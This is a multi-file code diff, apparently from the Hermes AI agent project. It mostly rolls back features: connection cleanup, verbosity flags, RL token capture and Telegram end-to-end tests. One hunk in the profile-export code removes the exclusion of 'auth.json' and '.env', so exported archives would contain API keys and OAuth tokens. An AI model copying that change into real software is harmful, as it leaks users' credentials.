# set was lost on restart, causing redundant re-flushes).
memory_flushed: bool = False
def to_dict(self) -> Dict[str, Any]:
result = {
"session_key": self.session_key,
@@ -387,7 +381,6 @@ class SessionEntry:
"last_prompt_tokens": self.last_prompt_tokens,
"estimated_cost_usd": self.estimated_cost_usd,
"cost_status": self.cost_status,
"memory_flushed": self.memory_flushed,
}
if self.origin:
result["origin"] = self.origin.to_dict()
@@ -423,7 +416,6 @@ class SessionEntry:
last_prompt_tokens=data.get("last_prompt_tokens", 0),
estimated_cost_usd=data.get("estimated_cost_usd", 0.0),
cost_status=data.get("cost_status", "unknown"),
memory_flushed=data.get("memory_flushed", False),
)
@@ -487,6 +479,9 @@ class SessionStore:
self._loaded = False
self._lock = threading.Lock()
self._has_active_processes_fn = has_active_processes_fn
# on_auto_reset is deprecated — memory flush now runs proactively
# via the background session expiry watcher in GatewayRunner.
self._pre_flushed_sessions: set = set() # session_ids already flushed by watcher
# Initialize SQLite session database
self._db = None
@@ -689,12 +684,15 @@ class SessionStore:
self._save()
return entry
else:
# Session is being auto-reset.
# Session is being auto-reset. The background expiry watcher
# should have already flushed memories proactively; discard
# the marker so it doesn't accumulate.
was_auto_reset = True
auto_reset_reason = reset_reason
# Track whether the expired session had any real conversation
reset_had_activity = entry.total_tokens > 0
db_end_session_id = entry.session_id
self._pre_flushed_sessions.discard(entry.session_id)
else:
was_auto_reset = False
auto_reset_reason = None

View File

@@ -196,7 +196,7 @@ def ensure_hermes_home():
# =============================================================================
DEFAULT_CONFIG = {
"model": "",
"model": "anthropic/claude-opus-4.6",
"fallback_providers": [],
"credential_pool_strategies": {},
"toolsets": ["hermes-cli"],

View File

@@ -1092,12 +1092,11 @@ def launchd_status(deep: bool = False):
# Gateway Runner
# =============================================================================
def run_gateway(verbose: int = 0, quiet: bool = False, replace: bool = False):
def run_gateway(verbose: bool = False, replace: bool = False):
"""Run the gateway in foreground.
Args:
verbose: Stderr log verbosity count added on top of default WARNING (0=WARNING, 1=INFO, 2+=DEBUG).
quiet: Suppress all stderr log output.
verbose: Enable verbose logging output.
replace: If True, kill any existing gateway instance before starting.
This prevents systemd restart loops when the old process
hasn't fully exited yet.
@@ -1116,8 +1115,7 @@ def run_gateway(verbose: int = 0, quiet: bool = False, replace: bool = False):
# Exit with code 1 if gateway fails to connect any platform,
# so systemd Restart=on-failure will retry on transient errors
verbosity = None if quiet else verbose
success = asyncio.run(start_gateway(replace=replace, verbosity=verbosity))
success = asyncio.run(start_gateway(replace=replace))
if not success:
sys.exit(1)
@@ -1891,10 +1889,9 @@ def gateway_command(args):
# Default to run if no subcommand
if subcmd is None or subcmd == "run":
verbose = getattr(args, 'verbose', 0)
quiet = getattr(args, 'quiet', False)
verbose = getattr(args, 'verbose', False)
replace = getattr(args, 'replace', False)
run_gateway(verbose, quiet=quiet, replace=replace)
run_gateway(verbose, replace=replace)
return
if subcmd == "setup":
@@ -2022,7 +2019,7 @@ def gateway_command(args):
# Start fresh
print("Starting gateway...")
run_gateway(verbose=0)
run_gateway(verbose=False)
elif subcmd == "status":
deep = getattr(args, 'deep', False)

View File

@@ -3857,10 +3857,7 @@ For more help on a command:
# gateway run (default)
gateway_run = gateway_subparsers.add_parser("run", help="Run gateway in foreground")
gateway_run.add_argument("-v", "--verbose", action="count", default=0,
help="Increase stderr log verbosity (-v=INFO, -vv=DEBUG)")
gateway_run.add_argument("-q", "--quiet", action="store_true",
help="Suppress all stderr log output")
gateway_run.add_argument("-v", "--verbose", action="store_true")
gateway_run.add_argument("--replace", action="store_true",
help="Replace any existing gateway instance (useful for systemd)")

View File

@@ -74,8 +74,6 @@ _DEFAULT_EXPORT_EXCLUDE_ROOT = frozenset({
"hermes_state.db",
"response_store.db", "response_store.db-shm", "response_store.db-wal",
"gateway.pid", "gateway_state.json", "processes.json",
"auth.json", # API keys, OAuth tokens, credential pools
".env", # API keys (dotenv)
"auth.lock", "active_profile", ".update_check",
"errors.log",
".hermes_history",
@@ -767,17 +765,8 @@ def export_profile(name: str, output_path: str) -> Path:
result = shutil.make_archive(base, "gztar", tmpdir, "default")
return Path(result)
# Named profiles — stage a filtered copy to exclude credentials
with tempfile.TemporaryDirectory() as tmpdir:
staged = Path(tmpdir) / name
_CREDENTIAL_FILES = {"auth.json", ".env"}
shutil.copytree(
profile_dir,
staged,
ignore=lambda d, contents: _CREDENTIAL_FILES & set(contents),
)
result = shutil.make_archive(base, "gztar", tmpdir, name)
return Path(result)
result = shutil.make_archive(base, "gztar", str(profile_dir.parent), name)
return Path(result)
def _normalize_profile_archive_parts(member_name: str) -> List[str]:

View File

@@ -71,7 +71,7 @@ def _get_model_config() -> Dict[str, Any]:
default = (cfg.get("default") or "").strip()
base_url = (cfg.get("base_url") or "").strip()
is_local = "localhost" in base_url or "127.0.0.1" in base_url
is_fallback = not default
is_fallback = not default or default == "anthropic/claude-opus-4.6"
if is_local and is_fallback and base_url:
detected = _auto_detect_local_model(base_url)
if detected:
@@ -133,8 +133,6 @@ def _resolve_runtime_from_pool_entry(
if cfg_provider == "anthropic":
cfg_base_url = str(model_cfg.get("base_url") or "").strip().rstrip("/")
base_url = cfg_base_url or base_url or "https://api.anthropic.com"
elif provider == "openrouter":
base_url = base_url or OPENROUTER_BASE_URL
elif provider == "nous":
api_mode = "chat_completions"
elif provider == "copilot":

View File

@@ -72,6 +72,8 @@ rl = [
"wandb>=0.15.0,<1",
]
yc-bench = ["yc-bench @ git+https://github.com/collinear-ai/yc-bench.git ; python_version >= '3.12'"]
taubench = ["tau-bench @ git+https://github.com/sierra-research/tau-bench.git"]
tau2bench = ["tau2 @ git+https://github.com/sierra-research/tau2-bench.git"]
all = [
"hermes-agent[modal]",
"hermes-agent[daytona]",

View File

@@ -88,7 +88,7 @@ from agent.model_metadata import (
)
from agent.context_compressor import ContextCompressor
from agent.prompt_caching import apply_anthropic_cache_control
from agent.prompt_builder import build_skills_system_prompt, build_context_files_prompt, load_soul_md, TOOL_USE_ENFORCEMENT_GUIDANCE, TOOL_USE_ENFORCEMENT_MODELS, DEVELOPER_ROLE_MODELS
from agent.prompt_builder import build_skills_system_prompt, build_context_files_prompt, load_soul_md, TOOL_USE_ENFORCEMENT_GUIDANCE, TOOL_USE_ENFORCEMENT_MODELS
from agent.usage_pricing import estimate_usage_cost, normalize_usage
from agent.display import (
KawaiiSpinner, build_tool_preview as _build_tool_preview,
@@ -471,7 +471,7 @@ class AIAgent:
acp_args: list[str] | None = None,
command: str = None,
args: list[str] | None = None,
model: str = "",
model: str = "anthropic/claude-opus-4.6", # OpenRouter format
max_iterations: int = 90, # Default tool-calling iterations (shared with subagents)
tool_delay: float = 1.0,
enabled_toolsets: List[str] = None,
@@ -516,9 +516,6 @@ class AIAgent:
checkpoint_max_snapshots: int = 50,
pass_session_id: bool = False,
persist_session: bool = True,
use_streaming: bool = True,
temperature: float = None,
insert_reasoning: bool = True,
):
"""
Initialize the AI Agent.
@@ -562,17 +559,11 @@ class AIAgent:
When provided and Honcho is enabled in config, enables persistent cross-session user modeling.
honcho_manager: Optional shared HonchoSessionManager owned by the caller.
honcho_config: Optional HonchoClientConfig corresponding to honcho_manager.
use_streaming (bool): Whether to use streaming for API calls (default: True)
temperature (float): Temperature for model responses (optional, uses model default if not set)
insert_reasoning (bool): Whether to insert reasoning into the API response (default: True)
"""
_install_safe_stdio()
self.model = model
self.max_iterations = max_iterations
self.use_streaming = use_streaming
self.temperature = temperature
self.insert_reasoning = insert_reasoning
# Shared iteration budget — parent creates, children inherit.
# Consumed by every LLM turn across parent + all subagents.
self.iteration_budget = iteration_budget or IterationBudget(max_iterations)
@@ -595,9 +586,10 @@ class AIAgent:
self.log_prefix_chars = log_prefix_chars
self.log_prefix = f"{log_prefix} " if log_prefix else ""
# Store effective base URL for feature detection (prompt caching, reasoning, etc.)
self.base_url = base_url or ""
# When no base_url is provided, the client defaults to OpenRouter, so reflect that here.
self.base_url = base_url or OPENROUTER_BASE_URL
provider_name = provider.strip().lower() if isinstance(provider, str) and provider.strip() else None
self.provider = provider_name or ""
self.provider = provider_name or "openrouter"
self.acp_command = acp_command or command
self.acp_args = list(acp_args or args or [])
if api_mode in {"chat_completions", "codex_responses", "anthropic_messages"}:
@@ -1925,11 +1917,7 @@ class AIAgent:
"from": "gpt",
"value": content.rstrip()
})
if "prompt_token_ids" in msg:
trajectory[-1]["prompt_token_ids"] = msg["prompt_token_ids"]
trajectory[-1]["generation_token_ids"] = msg["generation_token_ids"]
trajectory[-1]["generation_log_probs"] = msg["generation_log_probs"]
# Collect all subsequent tool responses
tool_responses = []
j = i + 1
@@ -1991,10 +1979,6 @@ class AIAgent:
"from": "gpt",
"value": content.strip()
})
if "prompt_token_ids" in msg:
trajectory[-1]["prompt_token_ids"] = msg["prompt_token_ids"]
trajectory[-1]["generation_token_ids"] = msg["generation_token_ids"]
trajectory[-1]["generation_log_probs"] = msg["generation_log_probs"]
elif msg["role"] == "user":
trajectory.append({
@@ -3559,78 +3543,15 @@ class AIAgent:
)
return client
@staticmethod
def _force_close_tcp_sockets(client: Any) -> int:
"""Force-close underlying TCP sockets to prevent CLOSE-WAIT accumulation.
When a provider drops a connection mid-stream, httpx's ``client.close()``
performs a graceful shutdown which leaves sockets in CLOSE-WAIT until the
OS times them out (often minutes). This method walks the httpx transport
pool and issues ``socket.shutdown(SHUT_RDWR)`` + ``socket.close()`` to
force an immediate TCP RST, freeing the file descriptors.
Returns the number of sockets force-closed.
"""
import socket as _socket
closed = 0
try:
http_client = getattr(client, "_client", None)
if http_client is None:
return 0
transport = getattr(http_client, "_transport", None)
if transport is None:
return 0
pool = getattr(transport, "_pool", None)
if pool is None:
return 0
# httpx uses httpcore connection pools; connections live in
# _connections (list) or _pool (list) depending on version.
connections = (
getattr(pool, "_connections", None)
or getattr(pool, "_pool", None)
or []
)
for conn in list(connections):
stream = (
getattr(conn, "_network_stream", None)
or getattr(conn, "_stream", None)
)
if stream is None:
continue
sock = getattr(stream, "_sock", None)
if sock is None:
sock = getattr(stream, "stream", None)
if sock is not None:
sock = getattr(sock, "_sock", None)
if sock is None:
continue
try:
sock.shutdown(_socket.SHUT_RDWR)
except OSError:
pass
try:
sock.close()
except OSError:
pass
closed += 1
except Exception as exc:
logger.debug("Force-close TCP sockets sweep error: %s", exc)
return closed
def _close_openai_client(self, client: Any, *, reason: str, shared: bool) -> None:
if client is None:
return
# Force-close TCP sockets first to prevent CLOSE-WAIT accumulation,
# then do the graceful SDK-level close.
force_closed = self._force_close_tcp_sockets(client)
try:
client.close()
logger.info(
"OpenAI client closed (%s, shared=%s, tcp_force_closed=%d) %s",
"OpenAI client closed (%s, shared=%s) %s",
reason,
shared,
force_closed,
self._client_log_context(),
)
except Exception as exc:
@@ -3675,76 +3596,6 @@ class AIAgent:
with self._openai_client_lock():
return self.client
def _cleanup_dead_connections(self) -> bool:
"""Detect and clean up dead TCP connections on the primary client.
Inspects the httpx connection pool for sockets in unhealthy states
(CLOSE-WAIT, errors). If any are found, force-closes all sockets
and rebuilds the primary client from scratch.
Returns True if dead connections were found and cleaned up.
"""
client = getattr(self, "client", None)
if client is None:
return False
try:
http_client = getattr(client, "_client", None)
if http_client is None:
return False
transport = getattr(http_client, "_transport", None)
if transport is None:
return False
pool = getattr(transport, "_pool", None)
if pool is None:
return False
connections = (
getattr(pool, "_connections", None)
or getattr(pool, "_pool", None)
or []
)
dead_count = 0
for conn in list(connections):
# Check for connections that are idle but have closed sockets
stream = (
getattr(conn, "_network_stream", None)
or getattr(conn, "_stream", None)
)
if stream is None:
continue
sock = getattr(stream, "_sock", None)
if sock is None:
sock = getattr(stream, "stream", None)
if sock is not None:
sock = getattr(sock, "_sock", None)
if sock is None:
continue
# Probe socket health with a non-blocking recv peek
import socket as _socket
try:
sock.setblocking(False)
data = sock.recv(1, _socket.MSG_PEEK | _socket.MSG_DONTWAIT)
if data == b"":
dead_count += 1
except BlockingIOError:
pass # No data available — socket is healthy
except OSError:
dead_count += 1
finally:
try:
sock.setblocking(True)
except OSError:
pass
if dead_count > 0:
logger.warning(
"Found %d dead connection(s) in client pool — rebuilding client",
dead_count,
)
self._replace_primary_openai_client(reason="dead_connection_cleanup")
return True
except Exception as exc:
logger.debug("Dead connection check error: %s", exc)
return False
def _create_request_openai_client(self, *, reason: str) -> Any:
from unittest.mock import Mock
@@ -4536,11 +4387,6 @@ class AIAgent:
type(e).__name__,
e,
)
self._emit_status(
f"⚠️ Connection to provider dropped "
f"({type(e).__name__}). Reconnecting… "
f"(attempt {_stream_attempt + 2}/{_max_stream_retries + 1})"
)
# Close the stale request client before retry
stale = request_client_holder.get("client")
if stale is not None:
@@ -4548,21 +4394,7 @@ class AIAgent:
stale, reason="stream_retry_cleanup"
)
request_client_holder["client"] = None
# Also rebuild the primary client to purge
# any dead connections from the pool.
try:
self._replace_primary_openai_client(
reason="stream_retry_pool_cleanup"
)
except Exception:
pass
continue
self._emit_status(
"❌ Connection to provider failed after "
f"{_max_stream_retries + 1} attempts. "
"The provider may be experiencing issues — "
"try again in a moment."
)
logger.warning(
"Streaming exhausted %s retries on transient error, "
"falling back to non-streaming: %s",
@@ -4634,12 +4466,6 @@ class AIAgent:
self._close_request_openai_client(rc, reason="stale_stream_kill")
except Exception:
pass
# Rebuild the primary client too — its connection pool
# may hold dead sockets from the same provider outage.
try:
self._replace_primary_openai_client(reason="stale_stream_pool_cleanup")
except Exception:
pass
# Reset the timer so we don't kill repeatedly while
# the inner thread processes the closure.
last_chunk_time["t"] = time.time()
@@ -5040,19 +4866,6 @@ class AIAgent:
tool_call.pop("call_id", None)
tool_call.pop("response_item_id", None)
# GPT-5 and Codex models respond better to 'developer' than 'system'
# for instruction-following. Swap the role at the API boundary so
# internal message representation stays uniform ("system").
_model_lower = (self.model or "").lower()
if (
sanitized_messages
and sanitized_messages[0].get("role") == "system"
and any(p in _model_lower for p in DEVELOPER_ROLE_MODELS)
):
# Shallow-copy the list + first message only — rest stays shared.
sanitized_messages = list(sanitized_messages)
sanitized_messages[0] = {**sanitized_messages[0], "role": "developer"}
provider_preferences = {}
if self.providers_allowed:
provider_preferences["only"] = self.providers_allowed
@@ -5072,8 +4885,6 @@ class AIAgent:
"messages": sanitized_messages,
"timeout": float(os.getenv("HERMES_API_TIMEOUT", 1800.0)),
}
if self.temperature is not None:
api_kwargs["temperature"] = self.temperature
if self.tools:
api_kwargs["tools"] = self.tools
@@ -5248,11 +5059,6 @@ class AIAgent:
"reasoning": reasoning_text,
"finish_reason": finish_reason,
}
if hasattr(assistant_message, "prompt_token_ids") and assistant_message.prompt_token_ids is not None:
msg["prompt_token_ids"] = assistant_message.prompt_token_ids
msg["generation_token_ids"] = assistant_message.generation_token_ids
msg["generation_log_probs"] = assistant_message.generation_log_probs
if hasattr(assistant_message, 'reasoning_details') and assistant_message.reasoning_details:
# Pass reasoning_details back unmodified so providers (OpenRouter,
@@ -5401,7 +5207,7 @@ class AIAgent:
api_msg = msg.copy()
if msg.get("role") == "assistant":
reasoning = msg.get("reasoning")
if reasoning and self.insert_reasoning:
if reasoning:
api_msg["reasoning_content"] = reasoning
api_msg.pop("reasoning", None)
api_msg.pop("finish_reason", None)
@@ -6398,7 +6204,6 @@ class AIAgent:
stream_callback: Optional[callable] = None,
persist_user_message: Optional[str] = None,
sync_honcho: bool = True,
dont_review: bool = False,
) -> Dict[str, Any]:
"""
Run a complete conversation with tool calling until completion.
@@ -6416,7 +6221,7 @@ class AIAgent:
synthetic prefixes.
sync_honcho: When False, skip writing the final synthetic turn back
to Honcho or queuing follow-up prefetch work.
dont_review: When True, skip reviewing memory and skills.
Returns:
Dict: Complete conversation result with final response and message history
"""
@@ -6449,20 +6254,6 @@ class AIAgent:
self._last_content_with_tools = None
self._mute_post_response = False
self._surrogate_sanitized = False
# Pre-turn connection health check: detect and clean up dead TCP
# connections left over from provider outages or dropped streams.
# This prevents the next API call from hanging on a zombie socket.
if self.api_mode != "anthropic_messages":
try:
if self._cleanup_dead_connections():
self._emit_status(
"🔌 Detected stale connections from a previous provider "
"issue — cleaned up automatically. Proceeding with fresh "
"connection."
)
except Exception:
pass
# NOTE: _turns_since_memory and _iters_since_skill are NOT reset here.
# They are initialized in __init__ and must persist across run_conversation
# calls so that nudge logic accumulates correctly in CLI mode.
@@ -6753,7 +6544,7 @@ class AIAgent:
# This ensures multi-turn reasoning context is preserved
if msg.get("role") == "assistant":
reasoning_text = msg.get("reasoning")
if reasoning_text and self.insert_reasoning:
if reasoning_text:
# Add reasoning_content for API compatibility (Moonshot AI, Novita, OpenRouter)
api_msg["reasoning_content"] = reasoning_text
@@ -6881,7 +6672,7 @@ class AIAgent:
if self.thinking_callback:
self.thinking_callback("")
_use_streaming = self.use_streaming
_use_streaming = True
if not self._has_stream_consumers():
# No display/TTS consumer. Still prefer streaming for
# health checking, but skip for Mock clients in tests
@@ -7059,15 +6850,6 @@ class AIAgent:
finish_reason = response.choices[0].finish_reason
if finish_reason == "length":
if not self.compression_enabled:
return {
"final_response": None,
"messages": messages,
"api_calls": api_call_count,
"completed": False,
"partial": True,
"error": "Response truncated due to output length limit",
}
self._vprint(f"{self.log_prefix}⚠️ Response truncated (finish_reason='length') - model hit max output tokens", force=True)
# ── Detect thinking-budget exhaustion ──────────────
@@ -7467,7 +7249,7 @@ class AIAgent:
or 'error code: 413' in error_msg
)
if is_payload_too_large and self.compression_enabled:
if is_payload_too_large:
compression_attempts += 1
if compression_attempts > max_compression_attempts:
self._vprint(f"{self.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached for payload-too-large error.", force=True)
@@ -7482,14 +7264,30 @@ class AIAgent:
"partial": True
}
self._emit_status(f"⚠️ Request payload too large (413) — compression attempt {compression_attempts}/{max_compression_attempts}...")
elif is_payload_too_large and not self.compression_enabled:
return {
"messages": messages,
"completed": False,
"api_calls": api_call_count,
"error": "Request payload too large (413). Cannot compress further.",
"partial": True
}
original_len = len(messages)
messages, active_system_prompt = self._compress_context(
messages, system_message, approx_tokens=approx_tokens,
task_id=effective_task_id,
)
if len(messages) < original_len:
self._emit_status(f"🗜️ Compressed {original_len}{len(messages)} messages, retrying...")
time.sleep(2) # Brief pause between compression retries
restart_with_compressed_messages = True
break
else:
self._vprint(f"{self.log_prefix}❌ Payload too large and cannot compress further.", force=True)
self._vprint(f"{self.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logging.error(f"{self.log_prefix}413 payload too large. Cannot compress further.")
self._persist_session(messages, conversation_history)
return {
"messages": messages,
"completed": False,
"api_calls": api_call_count,
"error": "Request payload too large (413). Cannot compress further.",
"partial": True
}
# Check for context-length errors BEFORE generic 4xx handler.
# Local backends (LM Studio, Ollama, llama.cpp) often return
@@ -7525,7 +7323,7 @@ class AIAgent:
force=True,
)
if is_context_length_error and self.compression_enabled:
if is_context_length_error:
compressor = self.context_compressor
old_ctx = compressor.context_length
@@ -7594,14 +7392,6 @@ class AIAgent:
"error": f"Context length exceeded ({approx_tokens:,} tokens). Cannot compress further.",
"partial": True
}
elif is_context_length_error and not self.compression_enabled:
return {
"messages": messages,
"completed": False,
"api_calls": api_call_count,
"error": f"Context length exceeded ({approx_tokens:,} tokens). Cannot compress further.",
"partial": True
}
# Check for non-retryable client errors (4xx HTTP status codes).
# These indicate a problem with the request itself (bad model ID,
@@ -7815,9 +7605,6 @@ class AIAgent:
break
try:
prompt_token_ids = None
generation_token_ids = None
generation_log_probs = None
if self.api_mode == "codex_responses":
assistant_message, finish_reason = self._normalize_codex_response(response)
elif self.api_mode == "anthropic_messages":
@@ -7827,12 +7614,6 @@ class AIAgent:
)
else:
assistant_message = response.choices[0].message
if hasattr(assistant_message, "prompt_token_ids") and assistant_message.prompt_token_ids is not None:
prompt_token_ids = assistant_message.prompt_token_ids
if hasattr(assistant_message, "generation_token_ids") and assistant_message.generation_token_ids is not None:
generation_token_ids = assistant_message.generation_token_ids
if hasattr(assistant_message, "generation_log_probs") and assistant_message.generation_log_probs is not None:
generation_log_probs = assistant_message.generation_log_probs
# Normalize content to string — some OpenAI-compatible servers
# (llama-server, etc.) return content as a dict or list instead
@@ -8275,34 +8056,28 @@ class AIAgent:
self._response_was_previewed = True
break
# No fallback -- the model kept emitting <think>...</think>
# with empty content for 3 retries. Preserve token IDs from
# the last API attempt (reasoning-only generation) so RL can
# train on this trajectory instead of dropping it entirely.
# Using _build_assistant_message ensures prompt_token_ids,
# generation_token_ids, and generation_log_probs are attached
# when present on the assistant_message object.
# No fallback -- if reasoning_text exists, the model put its
# entire response inside <think> tags; use that as the content.
if reasoning_text:
self._vprint(f"{self.log_prefix}Using reasoning as response content (model wrapped entire response in think tags).", force=True)
final_response = reasoning_text
# Preserve token IDs from the last API attempt by building the
# assistant message from the live API response object. This
# avoids the all-empty-output-items ValueError in NeMo RL's
# nemo_gym postprocessor when every turn was reasoning-only.
try:
_last_msg = self._build_assistant_message(assistant_message, finish_reason)
messages.append(_last_msg)
except Exception:
# If assistant_message is out of scope or _build fails,
# fall back to a message without token IDs (matches
# original behavior).
messages.append({
empty_msg = {
"role": "assistant",
"content": final_response,
"reasoning": reasoning_text,
"finish_reason": finish_reason,
})
}
messages.append(empty_msg)
break
# Truly empty -- no reasoning and no content
empty_msg = {
"role": "assistant",
"content": final_response,
"reasoning": reasoning_text,
"finish_reason": finish_reason,
}
messages.append(empty_msg)
self._cleanup_task_resources(effective_task_id)
self._persist_session(messages, conversation_history)
@@ -8512,9 +8287,7 @@ class AIAgent:
and "skill_manage" in self.valid_tool_names):
_should_review_skills = True
self._iters_since_skill = 0
if dont_review:
_should_review_memory = False
_should_review_skills = False
# Background memory/skill review — runs AFTER the response is delivered
# so it never competes with the user's task for model attention.
if final_response and not interrupted and (_should_review_memory or _should_review_skills):
@@ -8562,9 +8335,9 @@ class AIAgent:
def main(
query: str = None,
model: str = "",
model: str = "anthropic/claude-opus-4.6",
api_key: str = None,
base_url: str = "",
base_url: str = "https://openrouter.ai/api/v1",
max_turns: int = 10,
enabled_toolsets: str = None,
disabled_toolsets: str = None,

View File

@@ -48,11 +48,7 @@ def format_timestamp(seconds: float) -> str:
def fetch_transcript(video_id: str, languages: list = None):
"""Fetch transcript segments from YouTube.
Returns a list of dicts with 'text', 'start', and 'duration' keys.
Compatible with youtube-transcript-api v1.x.
"""
"""Fetch transcript segments from YouTube."""
try:
from youtube_transcript_api import YouTubeTranscriptApi
except ImportError:
@@ -60,17 +56,9 @@ def fetch_transcript(video_id: str, languages: list = None):
file=sys.stderr)
sys.exit(1)
api = YouTubeTranscriptApi()
if languages:
result = api.fetch(video_id, languages=languages)
else:
result = api.fetch(video_id)
# v1.x returns FetchedTranscriptSnippet objects; normalize to dicts
return [
{"text": seg.text, "start": seg.start, "duration": seg.duration}
for seg in result
]
return YouTubeTranscriptApi.get_transcript(video_id, languages=languages)
return YouTubeTranscriptApi.get_transcript(video_id)
def main():

View File

@@ -1,173 +0,0 @@
"""Shared fixtures for Telegram gateway e2e tests.
These tests exercise the full async message flow:
adapter.handle_message(event)
→ background task
→ GatewayRunner._handle_message (command dispatch)
→ adapter.send() (captured by mock)
No LLM, no real platform connections.
"""
import asyncio
import sys
import uuid
from datetime import datetime
from types import SimpleNamespace
from unittest.mock import AsyncMock, MagicMock
from gateway.config import GatewayConfig, Platform, PlatformConfig
from gateway.platforms.base import MessageEvent, SendResult
from gateway.session import SessionEntry, SessionSource, build_session_key
#Ensure telegram module is available (mock it if not installed)
def _ensure_telegram_mock():
"""Install mock telegram modules so TelegramAdapter can be imported."""
if "telegram" in sys.modules and hasattr(sys.modules["telegram"], "__file__"):
return # Real library installed
telegram_mod = MagicMock()
telegram_mod.Update = MagicMock()
telegram_mod.Update.ALL_TYPES = []
telegram_mod.Bot = MagicMock
telegram_mod.constants.ParseMode.MARKDOWN_V2 = "MarkdownV2"
telegram_mod.ext.Application = MagicMock()
telegram_mod.ext.Application.builder = MagicMock
telegram_mod.ext.ContextTypes.DEFAULT_TYPE = type(None)
telegram_mod.ext.MessageHandler = MagicMock
telegram_mod.ext.CommandHandler = MagicMock
telegram_mod.ext.filters = MagicMock()
telegram_mod.request.HTTPXRequest = MagicMock
for name in (
"telegram",
"telegram.constants",
"telegram.ext",
"telegram.ext.filters",
"telegram.request",
):
sys.modules.setdefault(name, telegram_mod)
_ensure_telegram_mock()
from gateway.platforms.telegram import TelegramAdapter # noqa: E402
#GatewayRunner factory (based on tests/gateway/test_status_command.py)
def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
"""Create a GatewayRunner with mocked internals for e2e testing.
Skips __init__ to avoid filesystem/network side effects.
All command-dispatch dependencies are wired manually.
"""
from gateway.run import GatewayRunner
runner = object.__new__(GatewayRunner)
runner.config = GatewayConfig(
platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="e2e-test-token")}
)
runner.adapters = {}
runner._voice_mode = {}
runner.hooks = SimpleNamespace(emit=AsyncMock(), loaded_hooks=False)
runner.session_store = MagicMock()
runner.session_store.get_or_create_session.return_value = session_entry
runner.session_store.load_transcript.return_value = []
runner.session_store.has_any_sessions.return_value = True
runner.session_store.append_to_transcript = MagicMock()
runner.session_store.rewrite_transcript = MagicMock()
runner.session_store.update_session = MagicMock()
runner.session_store.reset_session = MagicMock()
runner._running_agents = {}
runner._pending_messages = {}
runner._pending_approvals = {}
runner._session_db = None
runner._reasoning_config = None
runner._provider_routing = {}
runner._fallback_model = None
runner._show_reasoning = False
runner._is_user_authorized = lambda _source: True
runner._set_session_env = lambda _context: None
runner._should_send_voice_reply = lambda *_a, **_kw: False
runner._send_voice_reply = AsyncMock()
runner._capture_gateway_honcho_if_configured = lambda *a, **kw: None
runner._emit_gateway_run_progress = AsyncMock()
# Pairing store (used by authorization rejection path)
runner.pairing_store = MagicMock()
runner.pairing_store._is_rate_limited = MagicMock(return_value=False)
runner.pairing_store.generate_code = MagicMock(return_value="ABC123")
return runner
#TelegramAdapter factory
def make_adapter(runner) -> TelegramAdapter:
"""Create a TelegramAdapter wired to *runner*, with send methods mocked.
connect() is NOT called — no polling, no token lock, no real HTTP.
"""
config = PlatformConfig(enabled=True, token="e2e-test-token")
adapter = TelegramAdapter(config)
# Mock outbound methods so tests can capture what was sent
adapter.send = AsyncMock(return_value=SendResult(success=True, message_id="e2e-resp-1"))
adapter.send_typing = AsyncMock()
# Wire adapter ↔ runner
adapter.set_message_handler(runner._handle_message)
runner.adapters[Platform.TELEGRAM] = adapter
return adapter
#Helpers
def make_source(chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> SessionSource:
return SessionSource(
platform=Platform.TELEGRAM,
chat_id=chat_id,
user_id=user_id,
user_name="e2e_tester",
chat_type="dm",
)
def make_event(text: str, chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> MessageEvent:
return MessageEvent(
text=text,
source=make_source(chat_id, user_id),
message_id=f"msg-{uuid.uuid4().hex[:8]}",
)
def make_session_entry(source: SessionSource = None) -> SessionEntry:
source = source or make_source()
return SessionEntry(
session_key=build_session_key(source),
session_id=f"sess-{uuid.uuid4().hex[:8]}",
created_at=datetime.now(),
updated_at=datetime.now(),
platform=Platform.TELEGRAM,
chat_type="dm",
)
async def send_and_capture(adapter: TelegramAdapter, text: str, **event_kwargs) -> AsyncMock:
"""Send a message through the full e2e flow and return the send mock.
Drives: adapter.handle_message → background task → runner dispatch → adapter.send.
"""
event = make_event(text, **event_kwargs)
adapter.send.reset_mock()
await adapter.handle_message(event)
# Let the background task complete
await asyncio.sleep(0.3)
return adapter.send

View File

@@ -1,217 +0,0 @@
"""E2E tests for Telegram gateway slash commands.
Each test drives a message through the full async pipeline:
adapter.handle_message(event)
→ BasePlatformAdapter._process_message_background()
→ GatewayRunner._handle_message() (command dispatch)
→ adapter.send() (captured for assertions)
No LLM involved — only gateway-level commands are tested.
"""
import asyncio
from unittest.mock import AsyncMock
import pytest
from gateway.platforms.base import SendResult
from tests.e2e.conftest import (
make_adapter,
make_event,
make_runner,
make_session_entry,
make_source,
send_and_capture,
)
#Fixtures
@pytest.fixture()
def source():
return make_source()
@pytest.fixture()
def session_entry(source):
return make_session_entry(source)
@pytest.fixture()
def runner(session_entry):
return make_runner(session_entry)
@pytest.fixture()
def adapter(runner):
return make_adapter(runner)
#Tests
class TestTelegramSlashCommands:
"""Gateway slash commands dispatched through the full adapter pipeline."""
@pytest.mark.asyncio
async def test_help_returns_command_list(self, adapter):
send = await send_and_capture(adapter, "/help")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
assert "/new" in response_text
assert "/status" in response_text
@pytest.mark.asyncio
async def test_status_shows_session_info(self, adapter):
send = await send_and_capture(adapter, "/status")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
# Status output includes session metadata
assert "session" in response_text.lower() or "Session" in response_text
@pytest.mark.asyncio
async def test_new_resets_session(self, adapter, runner):
send = await send_and_capture(adapter, "/new")
send.assert_called_once()
runner.session_store.reset_session.assert_called_once()
@pytest.mark.asyncio
async def test_stop_when_no_agent_running(self, adapter):
send = await send_and_capture(adapter, "/stop")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
response_lower = response_text.lower()
assert "no" in response_lower or "stop" in response_lower or "not running" in response_lower
@pytest.mark.asyncio
async def test_commands_shows_listing(self, adapter):
send = await send_and_capture(adapter, "/commands")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
# Should list at least some commands
assert "/" in response_text
@pytest.mark.asyncio
async def test_sequential_commands_share_session(self, adapter):
"""Two commands from the same chat_id should both succeed."""
send_help = await send_and_capture(adapter, "/help")
send_help.assert_called_once()
send_status = await send_and_capture(adapter, "/status")
send_status.assert_called_once()
